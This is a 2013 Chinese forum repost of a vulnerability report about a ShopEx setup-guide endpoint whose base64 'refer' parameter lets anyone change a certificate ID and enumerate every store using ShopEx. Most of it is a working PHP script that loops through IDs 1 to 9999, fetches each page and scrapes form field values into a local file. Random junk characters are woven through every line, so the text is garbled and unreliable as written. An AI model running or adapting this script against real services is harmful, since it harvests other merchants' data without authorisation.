|
|
简要描述:
3 N& q( x" I1 B l0 o; D9 AShopEx某接口缺陷,可遍历所有网站2 B7 S( P. }6 i) l( i- V+ C
详细说明:1 H0 g: s% C) B. k( }) s3 V2 V+ G" n
问题出现在shopex 网店使用向导页面 9 E0 U* }& X( [# N( M2 I
; A" j1 ]: C6 Z7 O1 J- _* l- F* Q$ b
- c. [( \9 g2 _9 T0 U5 W% }, Y' m( P9 ^
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=1 S: q, A$ G; h
* C! d e6 O2 g, l$ ~
8 j& V }! V3 `0 l' a
/ J; N& S0 H( W' k
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}0 P2 b0 x) K6 F2 @9 a- {& h
$ G0 E0 a2 Q" F! z: v
* K& a1 Q% z f; R- l+ S0 y. g. i) v
8 F+ Q7 y: W5 H$ v& ?- s我们修改certi_id 即可遍历所有使用了ShopEx程序的网站 * `; L7 p. R3 k+ A
: o: }8 S# {0 w4 |9 p3 y8 W0 a: d1 W! u/ X- ^$ n
2 Z2 V7 S2 v0 o( a U
<?php
9 S: y; {; W {$ I& S
# {# M. H% c" z for ($i=1; $i < 10000; $i++) { //遍历7 N) k! O; S$ F7 [
5 L G! t# b2 l- W8 N ShowshopExD($i);7 g( d3 \. w2 }! [* h7 o9 G
* A3 y; d2 {! a0 k0 b4 p1 y+ D
}% l) |: I1 Y9 c/ c) d+ Y
# b3 T ^- W% J0 l$ v# }8 [ function ShowshopExD($cid) {
! t5 B" R: _% w" C' K* V9 k8 J0 b( l: u
$url='http://guide.ecos.shopex.cn/step2.php';% u' f, U4 Q) i) U* g+ ]" I. _
1 U5 H+ M `5 ~& Y. g
$refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');/ [% a3 S$ ^2 d/ i4 p6 D( g
9 T' `3 U% L9 P \ $url = $url.'?refer='.$refer;9 q$ f( B: I# W1 f, N
9 P+ |1 H( x7 G v9 D2 g! g
$ch = curl_init($url);& }" D& ?( r, `8 k& m6 S9 o
6 P" k! x) }$ r% |# c curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;6 H' q9 P& b1 Y' P0 k
$ N; w& v% i& ?0 [* h
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
) t6 K Q- }- D
) S6 C# q, D# U' J $result = curl_exec($ch);8 D: h5 e" g) ?0 q
* |8 j" u, I0 B9 g+ L, B& q) w2 X' b
$result = mb_convert_encoding($result, "gb2312", "UTF-8");
* n" y1 \( H: J- ]! f; |4 r0 p8 L
if(strpos($result,$refer))! t/ A& T9 {. ]" _4 `7 N
$ h9 a3 w; D" e) M {5 h1 W. g! x Z1 q6 l! ~. G
( }7 C( L# U( i6 D
$fp = fopen("c:/shopEx.txt",'ab'); //保存文件) F- T B' }" q6 ~8 d: z* B
& ~% U U+ u( R( ]* w" u preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
- H2 x" y: s. _6 ?- _, C% \, N8 D: ~1 L n
foreach ($value[1] as $key) {
. H1 o2 [* i( I
4 v e' c+ _4 q0 u preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);1 l8 L6 q0 l! [. O; t2 [
8 v9 T* F0 W. t echo $res[1][0].':'.$res[3][0]."\r\n";2 i D! y! P: z1 B! Q3 I1 X. D
2 m# }4 H% E1 i) o l $col =$res[1][0].':'.$res[3][0]."\r\n"; & _: s, K4 @( T" S
8 H6 h0 y( [5 c4 T9 h" o P& F
fwrite($fp, $col, strlen($col));
9 ?/ z8 O% T. c( x" Z, b! t
3 A7 K4 P- N$ o' c/ u }$ y& ]$ y" O% {5 g
) m# Z' W r$ H% c0 s/ ^& ~" T7 L echo '--------------------------------'."\r\n";' u- E% d% D7 D" R% g5 w
4 l# `2 @1 i& D0 t& Z9 J3 v+ h fclose($fp);
: {1 H1 K# W/ y$ E/ O# Y9 m
/ s1 }3 v! p7 o8 R1 f9 Y }
! g1 k0 P+ k3 @/ h! g! l) P. X/ {' s; v1 A. Y/ G
flush();1 @( d: ?$ @8 P6 q( b
* N. g! W( x4 K" i8 @5 D curl_close($ch);
9 ?. {# F% d. i
( A' A+ V; N- W( g# H, H/ h }
; ~. G* D) D* w$ j$ j1 r/ r$ B+ T+ Z: n0 G! W) W( c. p0 N" y
?>
9 |3 C- R8 f( r" N9 f T% k漏洞证明:4 N2 u/ W [8 Y) O& _: x! X; H
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
( H4 f' q" w+ E8 @2 g5 A/ L) irefer换成其他加密方式
1 ^( N4 {9 Q, s7 S0 \3 f |
|
发表于 2013-9-21 15:59:47
收藏
分享
支持
反对